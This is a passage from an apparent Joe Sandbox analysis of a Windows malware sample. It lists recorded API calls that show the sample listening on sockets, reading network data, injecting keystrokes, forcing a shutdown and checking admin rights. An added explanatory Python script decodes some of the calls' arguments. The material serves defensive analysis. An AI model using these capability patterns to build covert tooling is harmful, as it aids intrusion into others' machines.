                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                              • String ID: *.*
                                              • API String ID: 2185952417-438819550
                                              • Opcode ID: c7ba55a2053cc59b0fa531987d090348c2e932597d9a896c3fc3ca96e283d43d
                                              • Instruction ID: 0a7e372a0035e1dce073d792a3b4329990c325b2eba65bb49fcbc8e829164f68
                                              • Opcode Fuzzy Hash: c7ba55a2053cc59b0fa531987d090348c2e932597d9a896c3fc3ca96e283d43d
                                              • Instruction Fuzzy Hash: 8C415D71D4021AAFCF14DF64CC99AEEBBF4EF09364F1445A5E814E62A1EB309E84CB50
                                              APIs
                                                • Part of subcall function 00B89399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B893E3
                                                • Part of subcall function 00B89399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B89410
                                                • Part of subcall function 00B89399: GetLastError.KERNEL32 ref: 00B8941D
                                              • ExitWindowsEx.USER32(?,00000000), ref: 00B957B4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                              • String ID: $@$SeShutdownPrivilege
                                              • API String ID: 2234035333-194228
                                              • Opcode ID: 6eb341aa97868fbf0164663fe1a481a409f5d447ec1ceedc4971f186265f1414
                                              • Instruction ID: 84014e7464b1f7468778cc0accb4bbaafc23c171d1d791eda02ffd2d0e6036d9
                                              • Opcode Fuzzy Hash: 6eb341aa97868fbf0164663fe1a481a409f5d447ec1ceedc4971f186265f1414
                                              • Instruction Fuzzy Hash: 3A012431690702EAEF3962E49C8AFBB36D8EB04740F1000B9F813D20E2DA181D048364
                                              APIs
                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00BA69C7
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00BA69D6
                                              • bind.WSOCK32(00000000,?,00000010), ref: 00BA69F2
                                              • listen.WSOCK32(00000000,00000005), ref: 00BA6A01
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00BA6A1B
                                              • closesocket.WSOCK32(00000000,00000000), ref: 00BA6A2F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                              • String ID:
                                              • API String ID: 1279440585-0
                                              • Opcode ID: 852c847d74e5c02684fbb22e8e86dbb4d15bc732a2c842e3cbdcd3077354a28e
                                              • Instruction ID: 155b5d0369821edb8ff932233b637bc87c7fc190bceb40a3ba0c0226eab3497b
                                              • Opcode Fuzzy Hash: 852c847d74e5c02684fbb22e8e86dbb4d15bc732a2c842e3cbdcd3077354a28e
                                              • Instruction Fuzzy Hash: 3D21D0742006049FCB10FF68C889E2EB7E9EF49724F248199E956A73A1CB30AC01CB90
                                              APIs
                                                • Part of subcall function 00B329E2: GetWindowLongW.USER32(?,000000EB), ref: 00B329F3
                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 00B31DD6
                                              • GetSysColor.USER32(0000000F), ref: 00B31E2A
                                              • SetBkColor.GDI32(?,00000000), ref: 00B31E3D
                                                • Part of subcall function 00B3166C: DefDlgProcW.USER32(?,00000020,?), ref: 00B316B4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ColorProc$LongWindow
                                              • String ID:
                                              • API String ID: 3744519093-0
                                              • Opcode ID: 68a707358aeb311fba7573e09d74d05a0c194ba4d30dc2404e50e266ba321a66
                                              • Instruction ID: 28bc24fd5d5613f2fa495453a34339f56a8cf2045597201717be0351b2935516
                                              • Opcode Fuzzy Hash: 68a707358aeb311fba7573e09d74d05a0c194ba4d30dc2404e50e266ba321a66
                                              • Instruction Fuzzy Hash: BEA13570115414BBEA28AB6D8C89EBF39EDDF47301F3409EAF442DA191CF299D41C276
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00B9C329
                                              • _wcscmp.LIBCMT ref: 00B9C359
                                              • _wcscmp.LIBCMT ref: 00B9C36E
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00B9C37F
                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00B9C3AF
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                              • String ID:
                                              • API String ID: 2387731787-0
                                              • Opcode ID: a2949e9f7cd1cc8fca908dc4ee2abbdcd238462bc7ca2aaa88aeccbddb0d6d15
                                              • Instruction ID: 10505ab769be315b896ecee0b3800f4601b12895dcfbab895c3eeeac47ec2d06
                                              • Opcode Fuzzy Hash: a2949e9f7cd1cc8fca908dc4ee2abbdcd238462bc7ca2aaa88aeccbddb0d6d15
                                              • Instruction Fuzzy Hash: CC517C75A046029FCB14DF68D490EAABBE8EF49314F1046ADF956CB3A1DB30AD04CB91
                                              APIs
                                                • Part of subcall function 00BA8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00BA84A0
                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00BA6E89
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00BA6EB2
                                              • bind.WSOCK32(00000000,?,00000010), ref: 00BA6EEB
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00BA6EF8
                                              • closesocket.WSOCK32(00000000,00000000), ref: 00BA6F0C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                              • String ID:
                                              • API String ID: 99427753-0
                                              • Opcode ID: 5b3833cb4c6ed63eb0a6b23e5fb3dddb95630492c0377eb2e964ec4d1686f93e
                                              • Instruction ID: ca3f4a3f41e97a37cb78d0de7233c5bcce6eb7843d3df334768396453575b4fe
                                              • Opcode Fuzzy Hash: 5b3833cb4c6ed63eb0a6b23e5fb3dddb95630492c0377eb2e964ec4d1686f93e
                                              • Instruction Fuzzy Hash: 4941D175600200AFDB10BF64DC86F6EB3E8DB09714F148498FA45AB3D2DB70AD008BA1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                              • String ID:
                                              • API String ID: 292994002-0
                                              • Opcode ID: 0fcb4536a2c2eda9db05ddb0da0fc8ee9271c520451d41595bc8d3610ad46218
                                              • Instruction ID: f5358a56b8457e28f8965d1e4fe0837fefea7028f93b7c7d7332ff8935083824
                                              • Opcode Fuzzy Hash: 0fcb4536a2c2eda9db05ddb0da0fc8ee9271c520451d41595bc8d3610ad46218
                                              • Instruction Fuzzy Hash: 3511B6723009119FE7216F669C84B7A77D9EF48720F144169E846E7241CFB0ED018AA1
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: LocalTime__swprintf
                                              • String ID: %.3d$WIN_XPe
                                              • API String ID: 2070861257-2409531811
                                              • Opcode ID: 3f6ba72f6a558c7e34226cbd6ab4bc2eb0e7b2622f389ff19db9a2610703b14a
                                              • Instruction ID: 663b3dd9d022c8e6e8242698e02a8aa2cfcd5263eb241b0ce99aade2de3d6cc8
                                              • Opcode Fuzzy Hash: 3f6ba72f6a558c7e34226cbd6ab4bc2eb0e7b2622f389ff19db9a2610703b14a
                                              • Instruction Fuzzy Hash: 00D01D7186810DDAC715A650CCC4DF973FCA704314F1480D3F519A2050D7354748A711
                                              APIs
                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00BA2AAD
                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00BA2AE4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Internet$AvailableDataFileQueryRead
                                              • String ID:
                                              • API String ID: 599397726-0
                                              • Opcode ID: 14bbdb478c83fed6d7074d8c69bb537917a0b06536e839bd7aed9b4f58c5d8d3
                                              • Instruction ID: 2c406e29e06ca8461edc108c251b719177762471b7d12197f23fef13eeb7b868
                                              • Opcode Fuzzy Hash: 14bbdb478c83fed6d7074d8c69bb537917a0b06536e839bd7aed9b4f58c5d8d3
                                              • Instruction Fuzzy Hash: F241B371608609BFEB20DF98CC81FBBB7FCEB41764F1040AAF605A7241EA719E459660
                                              APIs
                                                • Part of subcall function 00B50FE6: std::exception::exception.LIBCMT ref: 00B5101C
                                                • Part of subcall function 00B50FE6: __CxxThrowException@8.LIBCMT ref: 00B51031
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B893E3
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B89410
                                              • GetLastError.KERNEL32 ref: 00B8941D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                              • String ID:
                                              • API String ID: 1922334811-0
                                              • Opcode ID: af817a7bd35be07379dcf866e7e66b50e75f87d1d59554001509318dead2dcf9
                                              • Instruction ID: 5971184d5dde79599980c750adbf55f6f25694d7979f5b58faf2e1caf806e610
                                              • Opcode Fuzzy Hash: af817a7bd35be07379dcf866e7e66b50e75f87d1d59554001509318dead2dcf9
                                              • Instruction Fuzzy Hash: 8A11BFB1414209AFE728EF54DC85E3BB7FCEB48711B2485AEE44983250EB30AC41CB64
                                              APIs
                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B942FF
                                              • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00B9433C
                                              • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B94345
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CloseControlCreateDeviceFileHandle
                                              • String ID:
                                              • API String ID: 33631002-0
                                              • Opcode ID: ee8df08099cbb14d89d47185b61120d3a8c58f07ac18ef94b46afac5038743d1
                                              • Instruction ID: ca15ca247aed3e37d4767d40393c89532fe40eba9a1c800c8676f08b66c732a3
                                              • Opcode Fuzzy Hash: ee8df08099cbb14d89d47185b61120d3a8c58f07ac18ef94b46afac5038743d1
                                              • Instruction Fuzzy Hash: E91182B1914229BEEB109BE89C44FAFBBBCEB09710F040166B914E7190C7745D0187A5
                                              APIs
                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B94F45
                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B94F5C
                                              • FreeSid.ADVAPI32(?), ref: 00B94F6C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                              • String ID:
                                              • API String ID: 3429775523-0
                                              • Opcode ID: c65b6de7cee8a9f3027619bf2455e794cc796d8634708c4fe5d4951554e47412
                                              • Instruction ID: c578b7fb0cfc4ae0928c56ea4364f7f057c62c5a079b1a798097b4b86e57ed45
                                              • Opcode Fuzzy Hash: c65b6de7cee8a9f3027619bf2455e794cc796d8634708c4fe5d4951554e47412
                                              • Instruction Fuzzy Hash: 64F03775A1120DFFDF04DFE09C89EAEBBB8EB08201F0044A9A901E2180E7346A048B50
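The raw argument values recorded in the API lists above are what turn a call name into a capability: socket(00000002,00000002,00000011) is an AF_INET/SOCK_DGRAM/IPPROTO_UDP socket that is then bound, the DeviceIoControl control code 002D1400 decomposes (CTL_CODE layout) to device type 0x2D, function 0x500, METHOD_BUFFERED, FILE_ANY_ACCESS, which is IOCTL_STORAGE_QUERY_PROPERTY, and its 0000000C input size matches sizeof(STORAGE_PROPERTY_QUERY); AllocateAndInitializeSid with two sub-authorities 00000020 and 00000220 followed by CheckTokenMembership is the standard BUILTIN\Administrators (S-1-5-32-544) membership test. The Python below is an added example, not part of the Joe Sandbox report or of the sample, that parses these call lines as the report prints them and decodes the constants. It assumes the SID identifier authority behind the pointer argument (shown as "?") is SECURITY_NT_AUTHORITY, which the trace cannot show, and it only names the constants present in its tables.

```python
"""Decode argument values from Joe Sandbox API-trace lines (constructed example)."""
import re

# Joe Sandbox prints a recorded call as:  Name.MODULE(arg,arg,...), ref: VA
# "?" marks an argument the sandbox could not resolve. "Part of subcall" lines
# and C++-mangled names (std::exception::exception) are not handled here.
CALL_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\)(?:, ref: (?P<ref>[0-9A-Fa-f]+))?$"
)

# CTL_CODE(DeviceType, Function, Method, Access) =
#   (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT", 2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS", 2: "FILE_WRITE_ACCESS",
          3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
FILE_DEVICE_MASS_STORAGE = 0x2D
KNOWN_IOCTLS = {0x2D1400: "IOCTL_STORAGE_QUERY_PROPERTY"}

# Winsock constants as seen in socket(af, type, protocol)
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
PROTO = {0: "IPPROTO_IP", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}

SECURITY_NT_AUTHORITY = 5  # assumption: the pointed-to authority is NT (S-1-5-...)
WELL_KNOWN_SIDS = {"S-1-5-32-544": "BUILTIN\\Administrators"}

# Call lines copied verbatim from the report's API lists above.
SAMPLE_TRACE = [
    "socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00BA6E89",
    "DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00B9433C",
    "AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,"
    "00000000,00000000,00000000,00000000,?,?), ref: 00B94F45",
]


def parse_call(line):
    """Return (api, module, args, ref); hex args become ints, '?' becomes None."""
    m = CALL_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox call line: {line!r}")
    args = []
    for tok in m.group("args").split(","):
        tok = tok.strip()
        if tok:
            args.append(None if tok == "?" else int(tok, 16))
    return m.group("api"), m.group("module"), args, m.group("ref")


def ctl_code(device_type, function, method, access):
    """Rebuild an IOCTL from its fields (same layout as the CTL_CODE macro)."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ctl_code(code):
    """Split an IOCTL into its CTL_CODE fields and name it if known."""
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": ACCESS[(code >> 14) & 0x3],
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 0x3],
        "name": KNOWN_IOCTLS.get(code, "unknown"),
    }


def decode_socket_call(af, sock_type, proto):
    """Map the three integer arguments of socket() to their Winsock names."""
    return (AF.get(af, hex(af)), SOCK_TYPE.get(sock_type, hex(sock_type)), PROTO.get(proto, hex(proto)))


def format_sid(identifier_authority, sub_authorities):
    """Render a SID in S-1-<authority>-<sub>... form (revision is always 1)."""
    return "S-1-" + "-".join(str(x) for x in [identifier_authority, *sub_authorities])


def triage(trace):
    """Decode the argument constants of the calls an analyst cares about."""
    findings = {}
    for line in trace:
        api, _module, args, _ref = parse_call(line)
        if api == "socket":
            findings[api] = dict(zip(("family", "type", "protocol"), decode_socket_call(*args[:3])))
        elif api == "DeviceIoControl":
            info = decode_ctl_code(args[1])
            info["in_buffer_size"] = args[3]  # 0xC == sizeof(STORAGE_PROPERTY_QUERY)
            findings[api] = info
        elif api == "AllocateAndInitializeSid":
            count = args[1]                    # nSubAuthorityCount
            subs = args[2:2 + count]           # the used sub-authority slots
            sid = format_sid(SECURITY_NT_AUTHORITY, subs)
            findings[api] = {"sid": sid, "account": WELL_KNOWN_SIDS.get(sid, "unknown")}
    return findings


if __name__ == "__main__":
    for api, info in triage(SAMPLE_TRACE).items():
        print(api, info)
```

Run against the three lines copied from this report, the decoder reports a UDP socket, IOCTL_STORAGE_QUERY_PROPERTY with a 12-byte input buffer, and S-1-5-32-544. The same parser can be fed any of the other call lines in this section; only the three APIs above get argument decoding, the others parse but produce no finding.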
                                              APIs
                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00B91B01
                                              • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00B91B14
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: InputSendkeybd_event
                                              • String ID:
                                              • API String ID: 3536248340-0
                                              • Opcode ID: 39dfffd02830b4b67ebf27931c25d4be31a61065727b99aeb5a0fa0fbe974b24
                                              • Instruction ID: fbd33441bdfcf9e0d47538ed9a39b1f5be8194cee9b51d4596ad3218af84c47d
                                              • Opcode Fuzzy Hash: 39dfffd02830b4b67ebf27931c25d4be31a61065727b99aeb5a0fa0fbe974b24
                                              • Instruction Fuzzy Hash: 7DF0A93190020DEBDB00DF94C845BFE7BB8FF18301F00804AF95996292D3398611DF94
                                              APIs
                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00BA9B52,?,00BC098C,?), ref: 00B9A6DA
                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00BA9B52,?,00BC098C,?), ref: 00B9A6EC
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ErrorFormatLastMessage
                                              • String ID:
                                              • API String ID: 3479602957-0
                                              • Opcode ID: f12b2b08605eb612057bc0f1c698e5f708c826454b4b87e3f320fb8b8f71e852
                                              • Instruction ID: 4444eedbd363837c97f35f24aaad73aa88fd013080c6de0617aa1b4018d09b3b
                                              • Opcode Fuzzy Hash: f12b2b08605eb612057bc0f1c698e5f708c826454b4b87e3f320fb8b8f71e852
                                              • Instruction Fuzzy Hash: 92F0893551421DBBDB20AFA4CC48FDA77ACEF09351F044195B518D7141DA309550CBE1
                                              APIs
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B88F27), ref: 00B88DFE
                                              • CloseHandle.KERNEL32(?,?,00B88F27), ref: 00B88E10
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AdjustCloseHandlePrivilegesToken
                                              • String ID:
                                              • API String ID: 81990902-0
                                              • Opcode ID: fb4c30170642f92904073be829cf19450623c2b3a563e4b935bae6bad63b8c63
                                              • Instruction ID: 87db22f53eaa4e89269761a843c2e370e7ad2d9e780a270a0873980f68f0bc5b
                                              • Opcode Fuzzy Hash: fb4c30170642f92904073be829cf19450623c2b3a563e4b935bae6bad63b8c63
